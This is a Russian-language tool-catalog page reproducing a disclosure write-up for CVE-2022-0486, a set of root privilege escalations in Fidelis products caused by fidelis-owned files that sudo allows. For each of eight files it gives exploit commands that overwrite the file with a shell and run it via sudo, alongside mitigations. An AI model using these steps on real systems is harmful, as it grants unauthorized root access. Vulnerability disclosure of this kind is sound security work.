Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-0486 — Fidelis Network and Deception — Повышение привилегий через небезопасные разрешения файлов — Множественные | Kitploit
Инструменты/GitHubGitHub/henryreed/cve-2022-0486
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception — Повышение привилегий через небезопасные разрешения файлов — Множественные

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Fidelis Network и Deception - CVE-2022-0486 - Небезопасные разрешения файлов - повышение привилегий - несколько уязвимостей

Возможность публикации и благодарности

Все эксплойты одобрены для публикации правительством США. Особая благодарность военнослужащим и представителям правительства, ответственным за утверждение документации для неограниченного распространения. Пожалуйста, обратитесь к следующим номерам OTR:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

Метаданные

Дата: 20220517 2005H UTC

Автор эксплойта: Henry Reed, The Aerospace Corporation

Сайт производителя: https://fidelissecurity.com/

Затронутые версии:

  • Fidelis CommandPost до 9.4.5
  • Fidelis Collector до 9.4.5
  • Fidelis Sensor до 9.4.5
  • Fidelis Sandbox до 9.4.5

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

CVE: CVE-2022-0486

Описание CVE: Неправильные разрешения файлов в компонентах CommandPost, Collector, Sensor и Sandbox продуктов Fidelis Network и Deception позволяют злоумышленнику с локальным административным доступом к CLI изменять затронутые файлы и повышать привилегии до уровня root. Уязвимость присутствует в версиях Fidelis Network и Deception до 9.4.5. Для устранения уязвимости доступны исправления и обновления.

Суть дела

В рамках этого CVE существует несколько эксплойтов, поскольку CVE охватывает ряд неправильных разрешений файлов. Все эксплойты обусловлены одной записью NOPASSWD и несколькими парольными привилегиями sudoers, предоставленными пользователю fidelis на бинарные файлы или сценарии, которыми владеет пользователь fidelis, что позволяет пользователю fidelis произвольно изменять файл. Это позволяет локально повысить привилегии.

Затронутый файл с NOPASSWD:

  • /FSS/bin/shutdown.pl

Затронутые файлы, требующие пароль:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

Рекомендуется пользователям затронутых продуктов Fidelis Deception или Fidelis Network обновить программное обеспечение для устранения этой уязвимости. Также рекомендуется всем пользователям, независимо от того, были ли они затронуты этой уязвимостью, отключить доступ к оболочке для своих продуктов Fidelis после первоначальной настройки.

Если по какой-либо причине ни то, ни другое невозможно, в этом документе описаны меры по смягчению последствий для каждого уязвимого файла. Насколько показало тестирование автора, пользователям, по-видимому, потребуется использовать одну из этих уязвимостей для повышения привилегий, прежде чем они смогут применить описанные меры, поэтому настоятельно рекомендуется обновить Fidelis и отключить SSH.

shutdown.pl Повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/bin/shutdown.pl позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/bin/shutdown.pl от имени root без запроса пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять сценарий и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла shutdown.pl:
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. Запустите файл с помощью команды sudo:
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости. Обратите внимание на строку NOPASSWD, которая указывает, что shutdown.pl является потенциальным кандидатом для повышения привилегий:

Смягчение:

Изменение владельца пользователя и группы /FSS/bin/shutdown.pl на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/bin/shutdown.pl смягчило бы эту уязвимость:

cert_mgmt Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/setup/cert_mgmt позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/setup/cert_mgmt от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять сценарий и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла cert_mgmt:
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/setup/cert_mgmt на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/setup/cert_mgmt смягчило бы эту уязвимость:

db_updater Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/bin/db_updater позволяют пользователю fidelis повышать привилегии до уровня root в Fidelis CommandPost. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/bin/db_updater от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять бинарный файл и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла db_updater:
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/bin/db_updater

Смягчение:

Изменение владельца пользователя и группы /FSS/bin/db_updater на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/bin/db_updater смягчило бы эту уязвимость:

deception-manager Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/deception-manager/bin/deception-manager позволяют пользователю fidelis повышать привилегии до уровня root в Fidelis CommandPost. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/deception-manager/bin/deception-manager от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять бинарный файл и повышать привилегии.

Эксплойт:

  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/deception-manager/bin/deception-manager на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/deception-manager/bin/deception-manager смягчило бы эту уязвимость:

fssdbg.sh Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/sbin/fssdbg.sh позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/sbin/fssdbg.sh от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять сценарий и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла fssdbg.sh:
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/sbin/fssdbg.sh на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/sbin/fssdbg.sh смягчило бы эту уязвимость:

mst Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/bin/mst позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/bin/mst от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять бинарный файл и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла mst:
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/bin/mst

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/bin/mst на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/bin/mst смягчило бы эту уязвимость. Ниже представлен скриншот, демонстрирующий смягчение повышения привилегий, и фрагмент вывода команды mst при запуске от имени fidelis без sudo:

Скриншот, показывающий, что даже при смягчении команда всё ещё может быть запущена через sudo пользователем fidelis:

Скриншот, показывающий, что mst нельзя изменить для выполнения другого произвольного кода при использовании смягчения:

setup Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/bin/setup позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/bin/setup от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять бинарный файл и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла setup:
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/bin/setup

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/bin/setup на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/bin/setup смягчило бы эту уязвимость:

setup Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/setup/unlock_cp_user.sh позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/setup/unlock_cp_user.sh от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять сценарий и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла unlock_cp_user.sh:
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/setup/unlock_cp_user.sh на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/setup/unlock_cp_user.sh смягчило бы эту уязвимость:

Скачать инструмент